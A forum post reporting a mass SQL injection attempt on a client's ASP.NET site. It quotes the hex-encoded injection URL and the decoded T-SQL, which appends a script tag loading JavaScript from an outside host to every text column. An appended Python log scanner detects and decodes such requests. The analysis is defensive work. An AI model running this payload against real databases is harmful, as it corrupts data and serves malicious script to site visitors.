I doubt you would; but never overlook SQL Injection. Just caught this in an error from a client's website.

Luckily I patched the SQL Injection holes when I took over the website; also, they've not been too clever, as the whole injection string would have been enclosed in quotes before being sent to the DB, as they have dumped it next to a string code!

Code:
/browse.aspx?title=All%20Devore%20Shawls&product=Accessories&subtype=SHW;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(<<lots of hexadecimal here>>%20VARCHAR(4000));EXEC(@S);--

The hex converts to:

Code:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bgsr.ru/js.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And the JS seems to record the URL of the hit site, I think; couldn't be bothered sorting through the obfuscated JS.

Anyway, shows the morals of http://www.bgsr.ru
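An added example, not part of the post above: a small Python detector for the request shape the poster caught (DECLARE a VARCHAR variable, SET it from a hex CAST, EXEC it), which URL-decodes a request line, pulls out the hex blob, converts it back to SQL the way the post does, and flags the two things that make this payload dangerous: the cursor loop that rewrites every text column of every user table, and the remote script tag the rows are made to carry. It assumes the elided part of the poster's URL read `CAST(0x... AS VARCHAR(4000))`, which is the usual form, and it also handles the NVARCHAR variant (UTF-16LE hex), which the post does not show. The log lines are constructed; the sample payload is the decoded SQL quoted in the post.

```python
import re
from urllib.parse import unquote

# Shape of the injected statement quoted in the post (after URL-decoding):
#   DECLARE @S VARCHAR(4000);SET @S=CAST(0x<hex> AS VARCHAR(4000));EXEC(@S);--
# The hex is the real SQL, encoded so the query string carries no quotes.
HEX_CAST_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\(\d+\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\(\s*0x([0-9A-Fa-f]+)\s*(?:AS\s+)?N?VARCHAR\(\d+\)\s*\)\s*;\s*"
    r"EXEC\(\s*@\1\s*\)",
    re.IGNORECASE,
)
# Cursor loop that rewrites every text column: EXEC('UPDATE ['+@T+'] SET ['+@C+']= ...
MASS_UPDATE_RE = re.compile(r"UPDATE\s*\['\+@\w+\+'\]", re.IGNORECASE)
# Remote script the rows are made to carry.
SCRIPT_SRC_RE = re.compile(r"<script\s+src=['\"]?([^'\">\s]+)", re.IGNORECASE)


def decode_hex_payload(hex_digits):
    """Turn the 0x... blob back into SQL. VARCHAR payloads are single-byte text;
    NVARCHAR variants carry UTF-16LE, recognisable by a NUL in every odd position."""
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]  # tolerate a truncated trailing nibble in a log line
    raw = bytes.fromhex(hex_digits)
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyse_request(url_or_logline):
    """Return a finding dict for a request carrying the hex-CAST injection, else None."""
    text = unquote(url_or_logline)
    m = HEX_CAST_RE.search(text)
    if not m:
        return None
    sql = decode_hex_payload(m.group(2))
    return {
        "variable": "@" + m.group(1),
        "sql": sql,
        "mass_update": bool(MASS_UPDATE_RE.search(sql)),
        "script_tags": SCRIPT_SRC_RE.findall(sql),
    }


def scan_log(lines):
    """Run analyse_request over each line; return (line_index, finding) for every hit."""
    hits = []
    for i, line in enumerate(lines):
        finding = analyse_request(line)
        if finding:
            hits.append((i, finding))
    return hits


# The decoded SQL from the post, used here only to build a constructed sample request.
PAYLOAD_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://www.bgsr.ru/js.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
# Constructed request in the shape of the one quoted in the post ("AS" assumed in the elided part).
SAMPLE_URL = (
    "/browse.aspx?title=All%20Devore%20Shawls&product=Accessories&subtype=SHW;"
    "DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + PAYLOAD_SQL.encode("latin-1").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);--"
)
# Constructed IIS-style log lines: one ordinary browse, one carrying the injection.
SAMPLE_LOG = [
    "2008-05-01 10:00:00 GET /browse.aspx?title=All%20Devore%20Shawls&product=Accessories 200",
    "2008-05-01 10:00:05 GET " + SAMPLE_URL + " 500",
]

if __name__ == "__main__":
    for idx, f in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {f['variable']} mass_update={f['mass_update']} scripts={f['script_tags']}")
        print(f["sql"][:120] + "...")
```

Run over web-server logs this gives the list of affected requests and, for each, the decoded statement, which is what you need to know which tables to clean. It is a detection aid only; as the poster notes, the durable fix is that the query string never reaches the database as concatenated SQL, i.e. parameterised queries on every input.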